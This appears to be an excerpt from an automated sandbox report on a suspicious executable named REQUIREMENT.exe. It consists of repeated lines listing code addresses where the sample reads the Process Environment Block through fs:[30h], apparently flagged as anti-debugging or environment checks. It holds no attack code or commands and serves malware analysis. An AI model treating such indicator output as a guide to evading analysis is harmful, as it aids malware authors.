Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F8B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98F8B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA31889 mov eax, dword ptr fs:[00000030h]	3_2_1EA31889
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA31889 mov eax, dword ptr fs:[00000030h]	3_2_1EA31889
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA31889 mov eax, dword ptr fs:[00000030h]	3_2_1EA31889
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1B890 mov eax, dword ptr fs:[00000030h]	3_2_1EA1B890
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1B890 mov eax, dword ptr fs:[00000030h]	3_2_1EA1B890
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1B890 mov ecx, dword ptr fs:[00000030h]	3_2_1EA1B890
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9998DE mov eax, dword ptr fs:[00000030h]	3_2_1E9998DE
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F8F8 mov eax, dword ptr fs:[00000030h]	3_2_1EA3F8F8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F8F8 mov eax, dword ptr fs:[00000030h]	3_2_1EA3F8F8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F8F8 mov eax, dword ptr fs:[00000030h]	3_2_1EA3F8F8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F8F8 mov eax, dword ptr fs:[00000030h]	3_2_1EA3F8F8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F8F8 mov eax, dword ptr fs:[00000030h]	3_2_1EA3F8F8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov esi, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD8F0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD8F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9878E1 mov eax, dword ptr fs:[00000030h]	3_2_1E9878E1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9958E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9958E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9958E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9958E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9958E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9958E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9958E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9958E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA518DA mov eax, dword ptr fs:[00000030h]	3_2_1EA518DA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA518DA mov eax, dword ptr fs:[00000030h]	3_2_1EA518DA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA518DA mov eax, dword ptr fs:[00000030h]	3_2_1EA518DA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA518DA mov eax, dword ptr fs:[00000030h]	3_2_1EA518DA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98D818 mov eax, dword ptr fs:[00000030h]	3_2_1E98D818
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F82B mov eax, dword ptr fs:[00000030h]	3_2_1EA4F82B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98D800 mov eax, dword ptr fs:[00000030h]	3_2_1E98D800
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3800 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3800
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3800 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3800
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3800 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3800
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BB839 mov eax, dword ptr fs:[00000030h]	3_2_1E9BB839
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99F870 mov eax, dword ptr fs:[00000030h]	3_2_1E99F870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99F870 mov eax, dword ptr fs:[00000030h]	3_2_1E99F870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A9870 mov eax, dword ptr fs:[00000030h]	3_2_1E9A9870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A9870 mov eax, dword ptr fs:[00000030h]	3_2_1E9A9870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F85F mov eax, dword ptr fs:[00000030h]	3_2_1EA3F85F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F85F mov eax, dword ptr fs:[00000030h]	3_2_1EA3F85F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3F85F mov eax, dword ptr fs:[00000030h]	3_2_1EA3F85F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1F85C mov eax, dword ptr fs:[00000030h]	3_2_1EA1F85C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1F85C mov eax, dword ptr fs:[00000030h]	3_2_1EA1F85C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1F85C mov eax, dword ptr fs:[00000030h]	3_2_1EA1F85C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1F9AA mov eax, dword ptr fs:[00000030h]	3_2_1EA1F9AA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1F9AA mov eax, dword ptr fs:[00000030h]	3_2_1EA1F9AA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B9B0 mov eax, dword ptr fs:[00000030h]	3_2_1E98B9B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD9CE mov eax, dword ptr fs:[00000030h]	3_2_1E9BD9CE
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B9C0 mov eax, dword ptr fs:[00000030h]	3_2_1E99B9C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B9C0 mov eax, dword ptr fs:[00000030h]	3_2_1E99B9C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BB9FA mov eax, dword ptr fs:[00000030h]	3_2_1E9BB9FA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4D9C6 mov eax, dword ptr fs:[00000030h]	3_2_1EA4D9C6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1D9C7 mov eax, dword ptr fs:[00000030h]	3_2_1EA1D9C7
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9899F0 mov ecx, dword ptr fs:[00000030h]	3_2_1E9899F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA399D6 mov ecx, dword ptr fs:[00000030h]	3_2_1EA399D6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987917 mov eax, dword ptr fs:[00000030h]	3_2_1E987917
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25930 mov eax, dword ptr fs:[00000030h]	3_2_1EA25930
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25930 mov eax, dword ptr fs:[00000030h]	3_2_1EA25930
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25930 mov eax, dword ptr fs:[00000030h]	3_2_1EA25930
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25930 mov ecx, dword ptr fs:[00000030h]	3_2_1EA25930
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B9938 mov ecx, dword ptr fs:[00000030h]	3_2_1E9B9938
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B931 mov eax, dword ptr fs:[00000030h]	3_2_1E98B931
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B931 mov eax, dword ptr fs:[00000030h]	3_2_1E98B931
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5921 mov eax, dword ptr fs:[00000030h]	3_2_1E9C5921
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5921 mov ecx, dword ptr fs:[00000030h]	3_2_1E9C5921
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5921 mov eax, dword ptr fs:[00000030h]	3_2_1E9C5921
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5921 mov eax, dword ptr fs:[00000030h]	3_2_1E9C5921
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B950 mov eax, dword ptr fs:[00000030h]	3_2_1E99B950
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B950 mov ecx, dword ptr fs:[00000030h]	3_2_1E99B950
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B950 mov eax, dword ptr fs:[00000030h]	3_2_1E99B950
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B950 mov eax, dword ptr fs:[00000030h]	3_2_1E99B950
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B950 mov eax, dword ptr fs:[00000030h]	3_2_1E99B950
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99B950 mov eax, dword ptr fs:[00000030h]	3_2_1E99B950
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD940 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD940
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD940 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD940
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5D946 mov eax, dword ptr fs:[00000030h]	3_2_1EA5D946
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4D947 mov eax, dword ptr fs:[00000030h]	3_2_1EA4D947
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1395B mov eax, dword ptr fs:[00000030h]	3_2_1EA1395B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1395B mov eax, dword ptr fs:[00000030h]	3_2_1EA1395B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1395B mov eax, dword ptr fs:[00000030h]	3_2_1EA1395B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F68C mov eax, dword ptr fs:[00000030h]	3_2_1EA4F68C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0D69D mov eax, dword ptr fs:[00000030h]	3_2_1EA0D69D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA256E0 mov eax, dword ptr fs:[00000030h]	3_2_1EA256E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA256E0 mov eax, dword ptr fs:[00000030h]	3_2_1EA256E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD6D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD6D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9896E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9896E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9896E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9896E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9956E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9956E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9956E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9956E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9956E0 mov eax, dword ptr fs:[00000030h]	3_2_1E9956E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D62C mov ecx, dword ptr fs:[00000030h]	3_2_1EA3D62C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D62C mov ecx, dword ptr fs:[00000030h]	3_2_1EA3D62C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D62C mov eax, dword ptr fs:[00000030h]	3_2_1EA3D62C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C360F mov eax, dword ptr fs:[00000030h]	3_2_1E9C360F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD600 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD600
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BD600 mov eax, dword ptr fs:[00000030h]	3_2_1E9BD600
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA19603 mov eax, dword ptr fs:[00000030h]	3_2_1EA19603
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F607 mov eax, dword ptr fs:[00000030h]	3_2_1EA4F607
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CF63F mov eax, dword ptr fs:[00000030h]	3_2_1E9CF63F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CF63F mov eax, dword ptr fs:[00000030h]	3_2_1E9CF63F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23608 mov eax, dword ptr fs:[00000030h]	3_2_1EA23608
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23608 mov eax, dword ptr fs:[00000030h]	3_2_1EA23608
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23608 mov eax, dword ptr fs:[00000030h]	3_2_1EA23608
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23608 mov eax, dword ptr fs:[00000030h]	3_2_1EA23608
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23608 mov eax, dword ptr fs:[00000030h]	3_2_1EA23608
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA23608 mov eax, dword ptr fs:[00000030h]	3_2_1EA23608
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E997623 mov eax, dword ptr fs:[00000030h]	3_2_1E997623
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E995622 mov eax, dword ptr fs:[00000030h]	3_2_1E995622
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E995622 mov eax, dword ptr fs:[00000030h]	3_2_1E995622
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25660 mov eax, dword ptr fs:[00000030h]	3_2_1EA25660
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99965A mov eax, dword ptr fs:[00000030h]	3_2_1E99965A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99965A mov eax, dword ptr fs:[00000030h]	3_2_1E99965A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C5654 mov eax, dword ptr fs:[00000030h]	3_2_1E9C5654
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1166E mov eax, dword ptr fs:[00000030h]	3_2_1EA1166E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1166E mov eax, dword ptr fs:[00000030h]	3_2_1EA1166E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1166E mov eax, dword ptr fs:[00000030h]	3_2_1EA1166E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98D64A mov eax, dword ptr fs:[00000030h]	3_2_1E98D64A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98D64A mov eax, dword ptr fs:[00000030h]	3_2_1E98D64A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993640 mov eax, dword ptr fs:[00000030h]	3_2_1E993640
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AF640 mov eax, dword ptr fs:[00000030h]	3_2_1E9AF640
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AF640 mov eax, dword ptr fs:[00000030h]	3_2_1E9AF640
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AF640 mov eax, dword ptr fs:[00000030h]	3_2_1E9AF640
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3660 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3660
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3660 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3660
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3660 mov eax, dword ptr fs:[00000030h]	3_2_1E9A3660
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987662 mov eax, dword ptr fs:[00000030h]	3_2_1E987662
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987662 mov eax, dword ptr fs:[00000030h]	3_2_1E987662
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E987662 mov eax, dword ptr fs:[00000030h]	3_2_1E987662
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5D7A7 mov eax, dword ptr fs:[00000030h]	3_2_1EA5D7A7
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5D7A7 mov eax, dword ptr fs:[00000030h]	3_2_1EA5D7A7
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5D7A7 mov eax, dword ptr fs:[00000030h]	3_2_1EA5D7A7
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C1796 mov eax, dword ptr fs:[00000030h]	3_2_1E9C1796
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C1796 mov eax, dword ptr fs:[00000030h]	3_2_1E9C1796
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA617BC mov eax, dword ptr fs:[00000030h]	3_2_1EA617BC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA6B781 mov eax, dword ptr fs:[00000030h]	3_2_1EA6B781
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA6B781 mov eax, dword ptr fs:[00000030h]	3_2_1EA6B781
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9977F9 mov eax, dword ptr fs:[00000030h]	3_2_1E9977F9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9977F9 mov eax, dword ptr fs:[00000030h]	3_2_1E9977F9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F7CF mov eax, dword ptr fs:[00000030h]	3_2_1EA4F7CF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9937E4 mov eax, dword ptr fs:[00000030h]	3_2_1E9937E4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99D700 mov ecx, dword ptr fs:[00000030h]	3_2_1E99D700
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B705 mov eax, dword ptr fs:[00000030h]	3_2_1E98B705
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B705 mov eax, dword ptr fs:[00000030h]	3_2_1E98B705
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B705 mov eax, dword ptr fs:[00000030h]	3_2_1E98B705
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98B705 mov eax, dword ptr fs:[00000030h]	3_2_1E98B705
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5970B mov eax, dword ptr fs:[00000030h]	3_2_1EA5970B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5970B mov eax, dword ptr fs:[00000030h]	3_2_1EA5970B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F717 mov eax, dword ptr fs:[00000030h]	3_2_1EA4F717
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B9723 mov eax, dword ptr fs:[00000030h]	3_2_1E9B9723
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F75B mov eax, dword ptr fs:[00000030h]	3_2_1E98F75B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C174A mov eax, dword ptr fs:[00000030h]	3_2_1E9C174A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C3740 mov eax, dword ptr fs:[00000030h]	3_2_1E9C3740
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1174B mov eax, dword ptr fs:[00000030h]	3_2_1EA1174B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1174B mov ecx, dword ptr fs:[00000030h]	3_2_1EA1174B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1763 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1763
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1763 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1763
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1763 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1763
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1763 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1763
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1763 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1763
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1763 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1763
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1D4A0 mov ecx, dword ptr fs:[00000030h]	3_2_1EA1D4A0
